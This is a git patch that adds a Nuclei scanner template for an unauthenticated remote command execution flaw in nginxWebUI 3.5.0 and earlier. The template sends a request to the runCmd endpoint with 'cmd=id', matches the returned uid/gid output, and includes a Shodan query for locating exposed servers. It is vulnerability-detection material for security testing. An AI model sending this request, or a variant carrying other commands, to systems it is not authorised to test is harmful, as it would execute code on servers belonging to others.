From 6e069a0025fc957f2842c0539fad1042188d163d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 27 Jul 2023 16:55:44 +0530 Subject: [PATCH] Create nginxwebui-runcmd-rce.yaml --- .../other/nginxwebui-runcmd-rce.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml diff --git a/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml b/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml new file mode 100644 index 0000000000..2c1864a828 --- /dev/null +++ b/http/vulnerabilities/other/nginxwebui-runcmd-rce.yaml @@ -0,0 +1,38 @@ +id: nginxwebui-runcmd-rce + +info: + name: nginxWebUI ≤ 3.5.0 runCmd - Remote Command Execution + author: DhiyaneshDk + severity: critical + description: | + nginxWebUI’s runCmd feature and is caused by incomplete validation of user input. Attackers can exploit the vulnerability by crafting malicious data to execute arbitrary commands on a vulnerable server without authorization. + reference: + - https://github.com/qingchenhh/qc_poc/blob/main/Goby/nginxWebUI_runCmd_rce.go + - https://www.ctfiot.com/124166.html + - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/nginxwebui-runcmd-remote-command-execution-vulnerability + metadata: + max-request: 1 + shodan-query: html:"nginxWebUI" + verified: true + tags: nginx,nginxwebui,rce + +http: + - method: GET + path: + - "{{BaseURL}}/AdminPage/conf/runCmd?cmd=id" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)' + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200